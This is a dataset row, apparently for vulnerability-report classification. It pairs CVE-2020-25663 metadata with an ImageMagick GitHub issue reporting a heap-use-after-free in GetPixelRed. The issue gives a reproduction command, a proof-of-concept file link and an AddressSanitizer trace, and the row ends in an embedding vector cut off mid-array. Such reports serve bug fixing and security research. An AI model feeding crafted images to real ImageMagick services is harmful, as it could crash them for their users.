cve_id
stringlengths
13
16
cve_published
timestamp[ns]
cve_descriptions
stringlengths
70
729
cve_metrics
dict
cve_references
listlengths
1
10
cve_configurations
listlengths
1
5
url
stringlengths
40
77
cve_tags
sequencelengths
1
4
domain
stringclasses
1 value
issue_owner_repo
sequencelengths
2
2
issue_body
stringlengths
0
7.94k
issue_title
stringlengths
1
307
issue_comments_url
stringlengths
59
81
issue_comments_count
int64
0
146
issue_created_at
timestamp[ns]
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
40
62
issue_github_id
int64
128M
1.01B
issue_number
int64
94
105k
label
bool
2 classes
issue_msg
stringlengths
120
8.13k
issue_msg_n_tokens
int64
120
8.13k
issue_embedding
sequencelengths
3.07k
3.07k
__index_level_0__
int64
0
3.61k
CVE-2020-25663
2020-12-08T21:15:12.420000
A call to ConformPixelInfo() in the SetImageAlphaChannel() routine of /MagickCore/channel.c caused a subsequent heap-use-after-free or heap-buffer-overflow READ when GetPixelRed() or GetPixelBlue() was called. This could occur if an attacker is able to submit a malicious image file to be processed by ImageMagick and could lead to denial of service. It likely would not lead to anything further because the memory is used as pixel data and not e.g. a function pointer. This flaw affects ImageMagick versions prior to 7.0.9-0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891601" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1723" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1723#issuecomment-718275153" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "A8FFBE52-1112-43E2-BC1B-D1388F18988C", "versionEndExcluding": "7.0.8-56", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1723
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a heap-use-after-free at MagickCore/pixel-accessor.h:378:10 in GetPixelRed ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://drive.google.com/file/d/1liJ7nJK0A4M_us-LuLZjwmqKXukx3nbO/view?usp=sharing) please run a following cmd with poc file. `magick $PoC -despeckle -flip -monochrome -alpha Shape tmp.rla` Here's ASAN log. ``` ==8370==ERROR: AddressSanitizer: heap-use-after-free on address 0x62a000024200 at pc 0x000000796779 bp 0x7ffdf7956b10 sp 0x7ffdf7956b08 READ of size 4 at 0x62a000024200 thread T0 #0 0x796778 in GetPixelRed ImageMagick/./MagickCore/pixel-accessor.h:378:10 #1 0x7938d7 in GetPixelIntensity ImageMagick/MagickCore/pixel.c:2367:24 #2 0x258de7a in SetImageAlphaChannel ImageMagick/MagickCore/channel.c:1298:28 #3 0x625776b in CLISimpleOperatorImage ImageMagick/MagickWand/operation.c:1765:18 #4 0x6250c70 in CLISimpleOperatorImages ImageMagick/MagickWand/operation.c:3685:12 #5 0x632eddb in CLIOption ImageMagick/MagickWand/operation.c:5302:16 #6 0x5588f52 in ProcessCommandOptions ImageMagick/MagickWand/magick-cli.c:477:7 #7 0x55910cc in MagickImageCommand ImageMagick/MagickWand/magick-cli.c:796:5 #8 0x559b0e3 in MagickCommandGenesis ImageMagick/MagickWand/mogrify.c:185:14 #9 0x51c3e5 in MagickMain ImageMagick/utilities/magick.c:149:10 #10 0x519c69 in main ImageMagick/utilities/magick.c:180:10 #11 0x7fdc4a357b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #12 0x421849 in _start (magick+0x421849) 0x62a000024200 is located 0 bytes inside of 22592-byte region [0x62a000024200,0x62a000029a40) freed by thread T0 here: #0 0x4e1530 in __interceptor_free.localalias.0 (magick+0x4e1530) #1 0x6c76f0 in RelinquishAlignedMemory ImageMagick/MagickCore/memory.c:1037:3 #2 0x245efb2 in RelinquishPixelCachePixels ImageMagick/MagickCore/cache.c:974:40 #3 0x24e304f in OpenPixelCache ImageMagick/MagickCore/cache.c:3762:19 #4 0x2506bd7 in GetImagePixelCache ImageMagick/MagickCore/cache.c:1757:18 #5 0x2533d59 in SyncImagePixelCache ImageMagick/MagickCore/cache.c:5501:28 #6 0x2601f04 in SetImageColorspace ImageMagick/MagickCore/colorspace.c:1244:10 #7 0x2609fa7 in TransformsRGBImage ImageMagick/MagickCore/colorspace.c:1981:11 #8 0x2605cc8 in TransformImageColorspace ImageMagick/MagickCore/colorspace.c:1407:12 #9 0x70c801 in ConformPixelInfo ImageMagick/MagickCore/pixel.c:232:12 #10 0x258da15 in SetImageAlphaChannel ImageMagick/MagickCore/channel.c:1294:9 #11 0x625776b in CLISimpleOperatorImage ImageMagick/MagickWand/operation.c:1765:18 #12 0x6250c70 in CLISimpleOperatorImages ImageMagick/MagickWand/operation.c:3685:12 #13 0x632eddb in CLIOption ImageMagick/MagickWand/operation.c:5302:16 #14 0x5588f52 in ProcessCommandOptions ImageMagick/MagickWand/magick-cli.c:477:7 #15 0x55910cc in MagickImageCommand ImageMagick/MagickWand/magick-cli.c:796:5 #16 0x559b0e3 in MagickCommandGenesis ImageMagick/MagickWand/mogrify.c:185:14 #17 0x51c3e5 in MagickMain ImageMagick/utilities/magick.c:149:10 #18 0x519c69 in main ImageMagick/utilities/magick.c:180:10 #19 0x7fdc4a357b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 previously allocated by thread T0 here: #0 0x4e2338 in __interceptor_posix_memalign (magick+0x4e2338) #1 0x6bcd6a in AcquireAlignedMemory ImageMagick/MagickCore/memory.c:265:7 #2 0x24e0cbd in OpenPixelCache ImageMagick/MagickCore/cache.c:3733:46 #3 0x2506bd7 in GetImagePixelCache ImageMagick/MagickCore/cache.c:1757:18 #4 0x2533d59 in SyncImagePixelCache ImageMagick/MagickCore/cache.c:5501:28 #5 0x56d7ad in SetImageStorageClass ImageMagick/MagickCore/image.c:2625:10 #6 0x258d244 in SetImageAlphaChannel ImageMagick/MagickCore/channel.c:1266:14 #7 0x625776b in CLISimpleOperatorImage ImageMagick/MagickWand/operation.c:1765:18 #8 0x6250c70 in CLISimpleOperatorImages ImageMagick/MagickWand/operation.c:3685:12 #9 0x632eddb in CLIOption ImageMagick/MagickWand/operation.c:5302:16 #10 0x5588f52 in ProcessCommandOptions ImageMagick/MagickWand/magick-cli.c:477:7 #11 0x55910cc in MagickImageCommand ImageMagick/MagickWand/magick-cli.c:796:5 #12 0x559b0e3 in MagickCommandGenesis ImageMagick/MagickWand/mogrify.c:185:14 #13 0x51c3e5 in MagickMain ImageMagick/utilities/magick.c:149:10 #14 0x519c69 in main ImageMagick/utilities/magick.c:180:10 #15 0x7fdc4a357b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-use-after-free ImageMagick/./MagickCore/pixel-accessor.h:378:10 in GetPixelRed Shadow bytes around the buggy address: 0x0c547fffc7f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffc800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffc810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffc820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffc830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c547fffc840:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c547fffc850: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c547fffc860: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c547fffc870: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c547fffc880: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c547fffc890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==8370==ABORTING ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-68 Q16 x86_64 2019-10-06 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-6 CXX=clang++6 CFLAGS="-fsanitize=address,undefined -g" CXXFLAGS="-fsanitize=address,undefined -g" ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
heap-use-after-free at MagickCore/pixel-accessor.h in GetPixelRed
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1723/comments
4
2019-10-06T12:41:15
2020-10-29T00:07:54Z
https://github.com/ImageMagick/ImageMagick/issues/1723
503,095,531
1,723
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : heap-use-after-free at MagickCore/pixel-accessor.h in GetPixelRed Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a heap-use-after-free at MagickCore/pixel-accessor.h:378:10 in GetPixelRed ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://drive.google.com/file/d/1liJ7nJK0A4M_us-LuLZjwmqKXukx3nbO/view?usp=sharing) please run a following cmd with poc file. `magick $PoC -despeckle -flip -monochrome -alpha Shape tmp.rla` Here's ASAN log. ``` ==8370==ERROR: AddressSanitizer: heap-use-after-free on address 0x62a000024200 at pc 0x000000796779 bp 0x7ffdf7956b10 sp 0x7ffdf7956b08 READ of size 4 at 0x62a000024200 thread T0 #0 0x796778 in GetPixelRed ImageMagick/./MagickCore/pixel-accessor.h:378:10 #1 0x7938d7 in GetPixelIntensity ImageMagick/MagickCore/pixel.c:2367:24 #2 0x258de7a in SetImageAlphaChannel ImageMagick/MagickCore/channel.c:1298:28 #3 0x625776b in CLISimpleOperatorImage ImageMagick/MagickWand/operation.c:1765:18 #4 0x6250c70 in CLISimpleOperatorImages ImageMagick/MagickWand/operation.c:3685:12 #5 0x632eddb in CLIOption ImageMagick/MagickWand/operation.c:5302:16 #6 0x5588f52 in ProcessCommandOptions ImageMagick/MagickWand/magick-cli.c:477:7 #7 0x55910cc in MagickImageCommand ImageMagick/MagickWand/magick-cli.c:796:5 #8 0x559b0e3 in MagickCommandGenesis ImageMagick/MagickWand/mogrify.c:185:14 #9 0x51c3e5 in MagickMain ImageMagick/utilities/magick.c:149:10 #10 0x519c69 in main ImageMagick/utilities/magick.c:180:10 #11 0x7fdc4a357b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #12 0x421849 in _start (magick+0x421849) 0x62a000024200 is located 0 bytes inside of 22592-byte region [0x62a000024200,0x62a000029a40) freed by thread T0 here: #0 0x4e1530 in __interceptor_free.localalias.0 (magick+0x4e1530) #1 0x6c76f0 in RelinquishAlignedMemory ImageMagick/MagickCore/memory.c:1037:3 #2 0x245efb2 in RelinquishPixelCachePixels ImageMagick/MagickCore/cache.c:974:40 #3 0x24e304f in OpenPixelCache ImageMagick/MagickCore/cache.c:3762:19 #4 0x2506bd7 in GetImagePixelCache ImageMagick/MagickCore/cache.c:1757:18 #5 0x2533d59 in SyncImagePixelCache ImageMagick/MagickCore/cache.c:5501:28 #6 0x2601f04 in SetImageColorspace ImageMagick/MagickCore/colorspace.c:1244:10 #7 0x2609fa7 in TransformsRGBImage ImageMagick/MagickCore/colorspace.c:1981:11 #8 0x2605cc8 in TransformImageColorspace ImageMagick/MagickCore/colorspace.c:1407:12 #9 0x70c801 in ConformPixelInfo ImageMagick/MagickCore/pixel.c:232:12 #10 0x258da15 in SetImageAlphaChannel ImageMagick/MagickCore/channel.c:1294:9 #11 0x625776b in CLISimpleOperatorImage ImageMagick/MagickWand/operation.c:1765:18 #12 0x6250c70 in CLISimpleOperatorImages ImageMagick/MagickWand/operation.c:3685:12 #13 0x632eddb in CLIOption ImageMagick/MagickWand/operation.c:5302:16 #14 0x5588f52 in ProcessCommandOptions ImageMagick/MagickWand/magick-cli.c:477:7 #15 0x55910cc in MagickImageCommand ImageMagick/MagickWand/magick-cli.c:796:5 #16 0x559b0e3 in MagickCommandGenesis ImageMagick/MagickWand/mogrify.c:185:14 #17 0x51c3e5 in MagickMain ImageMagick/utilities/magick.c:149:10 #18 0x519c69 in main ImageMagick/utilities/magick.c:180:10 #19 0x7fdc4a357b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 previously allocated by thread T0 here: #0 0x4e2338 in __interceptor_posix_memalign (magick+0x4e2338) #1 0x6bcd6a in AcquireAlignedMemory ImageMagick/MagickCore/memory.c:265:7 #2 0x24e0cbd in OpenPixelCache ImageMagick/MagickCore/cache.c:3733:46 #3 0x2506bd7 in GetImagePixelCache ImageMagick/MagickCore/cache.c:1757:18 #4 0x2533d59 in SyncImagePixelCache ImageMagick/MagickCore/cache.c:5501:28 #5 0x56d7ad in SetImageStorageClass ImageMagick/MagickCore/image.c:2625:10 #6 0x258d244 in SetImageAlphaChannel ImageMagick/MagickCore/channel.c:1266:14 #7 0x625776b in CLISimpleOperatorImage ImageMagick/MagickWand/operation.c:1765:18 #8 0x6250c70 in CLISimpleOperatorImages ImageMagick/MagickWand/operation.c:3685:12 #9 0x632eddb in CLIOption ImageMagick/MagickWand/operation.c:5302:16 #10 0x5588f52 in ProcessCommandOptions ImageMagick/MagickWand/magick-cli.c:477:7 #11 0x55910cc in MagickImageCommand ImageMagick/MagickWand/magick-cli.c:796:5 #12 0x559b0e3 in MagickCommandGenesis ImageMagick/MagickWand/mogrify.c:185:14 #13 0x51c3e5 in MagickMain ImageMagick/utilities/magick.c:149:10 #14 0x519c69 in main ImageMagick/utilities/magick.c:180:10 #15 0x7fdc4a357b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-use-after-free ImageMagick/./MagickCore/pixel-accessor.h:378:10 in GetPixelRed Shadow bytes around the buggy address: 0x0c547fffc7f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffc800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffc810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffc820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffc830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c547fffc840:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c547fffc850: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c547fffc860: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c547fffc870: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c547fffc880: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c547fffc890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==8370==ABORTING ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-68 Q16 x86_64 2019-10-06 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-6 CXX=clang++6 CFLAGS="-fsanitize=address,undefined -g" CXXFLAGS="-fsanitize=address,undefined -g" ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! --> --- end body ---
7,538
[ -0.040803104639053345, -0.01668344810605049, -0.004887728951871395, -0.000345785403624177, 0.025615129619836807, 0.020360393449664116, -0.011065132915973663, 0.02897651679813862, -0.008204525336623192, 0.03015643171966076, -0.011943208985030651, -0.015970012173056602, 0.020236913114786148, 0.00881506223231554, 0.005854984745383263, 0.0030698368791490793, -0.03679688274860382, 0.036961521953344345, -0.04036406800150871, -0.015284014865756035, 0.003941053058952093, -0.031912583857774734, -0.038498155772686005, 0.03874511271715164, -0.01647765003144741, 0.008376023732125759, -0.0034660000819712877, 0.022939741611480713, -0.008156505413353443, 0.0024815944489091635, 0.01819264143705368, 0.0226241834461689, 0.005806965287774801, 0.01468033716082573, 0.009885217994451523, -0.0008549238555133343, 0.03553464636206627, 0.06667891144752502, 0.03745543956756592, 0.025944408029317856, -0.0070589096285402775, -0.05372729152441025, 0.006318032741546631, -0.00918550044298172, -0.028784437105059624, -0.007532247807830572, 0.01878259889781475, -0.012821285054087639, -0.03523280844092369, 0.02439405582845211, 0.012059828266501427, 0.008382883854210377, -0.014213859103620052, -0.05117538198828697, 0.016875527799129486, -0.03762007877230644, 0.04719659686088562, 0.02103267051279545, 0.010777014307677746, -0.02152658812701702, -0.02339250035583973, 0.02808471955358982, 0.0037969937548041344, 0.021718667820096016, -0.015050775371491909, -0.031144266948103905, 0.0076351473107934, -0.01221074815839529, -0.01323288306593895, 0.002435289556160569, -0.019413717091083527, -0.02472333423793316, 0.020401552319526672, 0.038882315158843994, 0.00021255190949887037, 0.04398613050580025, 0.03800423815846443, -0.012087267823517323, -0.041159823536872864, 0.02134822867810726, -0.06437396258115768, 0.017822204157710075, -0.04535812512040138, 0.055483441799879074, 0.041571423411369324, -0.003232761053368449, -0.011703110300004482, -0.07567919790744781, -0.021773546934127808, -0.011854029260575771, 0.010756433941423893, 0.021691227331757545, 0.024298015981912613, 0.010488894768059254, 0.022514423355460167, 0.0010461455676704645, -0.008218244649469852, -0.010070436634123325, -0.03907439112663269, 0.031940024346113205, -0.020072273910045624, -0.01216958835721016, 0.00450357049703598, 0.01754780486226082, 0.025505371391773224, 0.0158328115940094, -0.01435105875134468, -0.025436772033572197, 0.015064495615661144, 0.12227211892604828, -0.008437763899564743, -0.016999008134007454, 0.005666335579007864, 0.013178003951907158, 0.014954735524952412, 0.028427718207240105, 0.016957847401499748, 0.0076831672340631485, -0.037729837000370026, -0.026369726285338402, -0.023721778765320778, -0.04321781545877457, 0.017410606145858765, 0.023941297084093094, -0.010694693773984909, 0.0103516960516572, 0.01937255635857582, -0.019153038039803505, -0.015901412814855576, -0.005896144546568394, -0.00949419941753149, -0.03295530006289482, 0.00849264394491911, -0.011675669811666012, 0.002157460665330291, -0.00890424195677042, -0.02141682803630829, 0.036632243543863297, 0.016738329082727432, -0.010036136955022812, -0.051257699728012085, -0.05449560657143593, 0.022761382162570953, 0.021169869229197502, 0.007758626714348793, 0.010777014307677746, -0.015187975019216537, 0.011799149215221405, -0.007593987509608269, -0.020236913114786148, -0.021252188831567764, -0.008211384527385235, 0.029305795207619667, -0.008856222033500671, 0.05219065770506859, 0.0009458184358663857, 0.01801428198814392, 0.03339433670043945, -0.03141866624355316, -0.021636348217725754, -0.017534084618091583, -0.03446449339389801, 0.010873053222894669, -0.015146815218031406, 0.0011696249712258577, -0.02406477741897106, -0.017685003578662872, 0.010495754890143871, -0.00035843346267938614, 0.025450490415096283, -0.0012931044911965728, 0.004928888753056526, 0.0003492153773549944, -0.010818174108862877, -0.05855670943856239, 0.015476093627512455, -0.004150282125920057, 0.010818174108862877, -0.00831428449600935, -0.04338245466351509, 0.01216958835721016, -0.013637621887028217, -0.006115663796663284, 0.0009192360448651016, 0.023612018674612045, -0.007820366881787777, 0.018713999539613724, -0.04110494256019592, -0.00046090426621958613, 0.01946859620511532, 0.008547523058950901, -0.03781215846538544, 0.025820929557085037, -0.0325985811650753, 0.038882315158843994, -0.0031795965041965246, -0.017095046117901802, -0.04063846543431282, 0.030321070924401283, -0.04598924145102501, -0.003941053058952093, -0.022171424701809883, -0.0297448318451643, 0.0009415309759788215, 0.004205162171274424, 0.02560141123831272, -0.02536817081272602, 0.031144266948103905, 0.029909471049904823, -0.022816263139247894, -0.018796319141983986, -0.022994620725512505, 0.004321781452745199, 0.007799786515533924, -0.031171707436442375, 0.024709613993763924, -0.014831256121397018, -0.0013505567330867052, -0.025477930903434753, 0.01336322259157896, -0.004479561001062393, -0.007353888358920813, -0.01565445214509964, -0.02734384313225746, -0.02451753430068493, -0.012574326246976852, 0.004520720802247524, -0.004139992408454418, -0.036879200488328934, -0.0023512549232691526, 0.004198302049189806, -0.03863535448908806, 0.022020505741238594, -0.022404663264751434, 0.013665061444044113, -0.002550194039940834, -0.015174254775047302, 0.001155905076302588, -0.00940501969307661, 0.0193451177328825, -0.0047711096704006195, 0.018617959693074226, -0.024915413931012154, -0.003947913181036711, 0.04755331575870514, 0.04417821019887924, -0.0452483668923378, -0.02339250035583973, -0.03339433670043945, 0.01993507519364357, 0.018329842016100883, -0.03893719241023064, -0.02226746454834938, -0.0076351473107934, 0.0036700842902064323, -0.026589246466755867, 0.01988019421696663, -0.020579911768436432, -0.01775360479950905, -0.012718386016786098, 0.05408400669693947, 0.020566191524267197, -0.019921354949474335, 0.005059228278696537, 0.023735499009490013, 0.002680533565580845, -0.013157423585653305, -0.0024661594070494175, -0.00045147183118388057, 0.0010349981021136045, 0.02224002406001091, -0.007038329727947712, -0.007868385873734951, -0.048211872577667236, -0.038470715284347534, 0.0013925740495324135, 0.018082883208990097, -0.0025964989326894283, 0.01698528788983822, -0.024558695033192635, 0.014145259745419025, 0.0033716754987835884, -0.01004299707710743, 0.024942852556705475, 0.0005205002962611616, 0.000831771467346698, 0.026040447875857353, -0.02082687057554722, -0.036906640976667404, -0.018590521067380905, -0.0060264840722084045, 0.001819607219658792, -0.027947520837187767, 0.0010941652581095695, 0.006901130545884371, 0.004057672806084156, -0.002665098523721099, -0.016752047464251518, -0.014241298660635948, 0.0015383483842015266, -0.023433659225702286, -0.038168877363204956, 0.005120967980474234, 0.023612018674612045, 0.0007040044874884188, 0.01609349064528942, -0.03163818642497063, 0.034327294677495956, 0.014886136166751385, -0.012293067760765553, 0.04917227104306221, -0.043547093868255615, 0.009926377795636654, -0.02085431106388569, -0.008691582828760147, -0.020840590819716454, -0.009713718667626381, -0.014776377007365227, 0.0025176091585308313, 0.0006388347828760743, -0.04486420750617981, -0.04255925863981247, -0.020744550973176956, 0.02341993898153305, 0.015421213582158089, 0.019948795437812805, -0.018178923055529594, 0.030266189947724342, -0.10443619638681412, 0.026438327506184578, -0.018864918500185013, -0.03487608954310417, -0.022967182099819183, -0.006551271770149469, 0.03012899123132229, -0.04310805723071098, -0.012437126599252224, 0.05062658339738846, 0.035370007157325745, 0.027206644415855408, -0.012416547164320946, 0.013431822881102562, -0.01128465123474598, -0.032653458416461945, 0.004805409349501133, -0.017863363027572632, 0.009000281803309917, 0.006743350997567177, 0.02144426852464676, 0.007278428878635168, 0.0009526784415356815, 0.047388676553964615, 0.006907990202307701, 0.02406477741897106, 0.008348584175109863, 0.009226660244166851, -0.020044833421707153, -0.0160660520195961, 0.005189567804336548, -0.030019231140613556, 0.021924465894699097, -0.05103818327188492, -0.003646074328571558, 0.00023838397464714944, 0.017877083271741867, 0.006215133238583803, -0.008547523058950901, -0.00576580548658967, -0.004404101055115461, 0.005882424768060446, -0.02985459193587303, 0.07809390872716904, -0.03682432323694229, 0.022939741611480713, -0.02439405582845211, -0.045083727687597275, 0.020332952961325645, 0.013740520924329758, -0.03901951387524605, 0.004863718990236521, -0.016642289236187935, 0.013665061444044113, 0.04667523875832558, -0.013884580694139004, 0.04785515367984772, 0.032763220369815826, -0.007395048160105944, 0.024846812710165977, 0.00917178113013506, -0.043574534356594086, -0.04225742071866989, 0.028372839093208313, -0.01881003938615322, -0.04170862212777138, -0.006307743024080992, 0.029991792514920235, 0.012697805650532246, -0.02433917671442032, 0.025944408029317856, -0.051586978137493134, 0.014076659455895424, -0.024709613993763924, 0.01054377481341362, 0.030650349333882332, -0.02595812827348709, 0.022349784150719643, 0.026712724938988686, 0.004476130940020084, 0.04143422096967697, -0.0018899219576269388, 0.023639459162950516, 0.006901130545884371, -0.04055614769458771, 0.00918550044298172, 0.037290800362825394, 0.007148089352995157, -0.0016721178544685245, 0.014186419546604156, -0.02108754962682724, 0.01621697098016739, -0.037757277488708496, -0.006582141853868961, -0.02064851112663746, 0.03622064366936684, 0.0013128268765285611, -0.0032722060568630695, -0.010434015654027462, 0.012437126599252224, 0.01727340556681156, -0.024256855249404907, -0.035068169236183167, -0.017204806208610535, -0.0029515023343265057, -0.008355444297194481, -0.022432103753089905, -0.015791652724146843, -0.03015643171966076, -0.027659401297569275, -0.019592076539993286, -0.001003270735964179, 0.0007863241480663419, 0.02867467701435089, -0.04286109656095505, -0.02459985390305519, -0.019564636051654816, -0.03446449339389801, -0.014598017558455467, 0.002371834823861718, 0.007250988855957985, -0.026602966710925102, -0.044672127813100815, 0.04950154945254326, 0.0017492924816906452, -0.0359736867249012, 0.023666897788643837, -0.01565445214509964, -0.036577362567186356, 0.0000293692501145415, 0.020744550973176956, 0.01221074815839529, 0.012114708311855793, 0.009288400411605835, -0.016930406913161278, -0.02498401328921318, -0.015201695263385773, 0.02936067432165146, 0.0103516960516572, 0.005978464614599943, 0.012443986721336842, -0.011373830959200859, 0.0035843346267938614, 0.04050126671791077, -0.0018882069271057844, -0.0023615448735654354, -0.002435289556160569, 0.03021131083369255, -0.002937782322987914, -0.005968174431473017, 0.01736944541335106, -0.04801979288458824, 0.004675069823861122, -0.04983082786202431, -0.03586392477154732, 0.017355725169181824, 0.02800239995121956, 0.01045459508895874, 0.0018916368717327714, 0.014858696609735489, -0.03781215846538544, -0.006101944018155336, 0.02088174968957901, 0.012052968144416809, -0.007305868901312351, -0.03095218725502491, -0.004904878791421652, 0.014460817910730839, -0.022281184792518616, -0.025999289005994797, 0.028894197195768356, 0.014255018904805183, 0.018617959693074226, -0.014652897603809834, 0.013404382392764091, -0.02933323383331299, 0.015380053780972958, -0.04327269643545151, -0.01742432452738285, 0.012636065483093262, -0.04179093986749649, -0.04058358445763588, 0.02385897748172283, -0.027947520837187767, 0.025971848517656326, -0.03163818642497063, 0.025244692340493202, -0.0089934216812253, 0.03778471797704697, -0.00745678786188364, 0.00900714099407196, 0.009741158224642277, -0.012258767150342464, -0.026959683746099472, 0.020209472626447678, 0.03937623277306557, 0.038553036749362946, -0.0015203410293906927, 0.03413521498441696, -0.0025742040015757084, 0.033833373337984085, -0.018206361681222916, 0.02208910509943962, 0.0056457556784152985, -0.016999008134007454, 0.030074112117290497, -0.005515416618436575, 0.02531329169869423, -0.027000844478607178, -0.004959758836776018, 0.006314603146165609, -0.01621697098016739, -0.007792926859110594, 0.04673011973500252, -0.018329842016100883, -0.008760182186961174, -0.04785515367984772, 0.013507282361388206, -0.01795940287411213, 0.03860791400074959, -0.008719022385776043, 0.005436526611447334, 0.004757389426231384, -0.02495657280087471, 0.015201695263385773, 0.012190167792141438, -0.003724964102730155, 0.00468192994594574, 0.006064213812351227, -0.0030252470169216394, 0.027549641206860542, 0.012697805650532246, 0.01660112850368023, -0.020072273910045624, 0.02188330702483654, 0.0065924315713346004, -0.010605514980852604, -0.015613293275237083, 0.0026222236920148134, 0.0259032491594553, 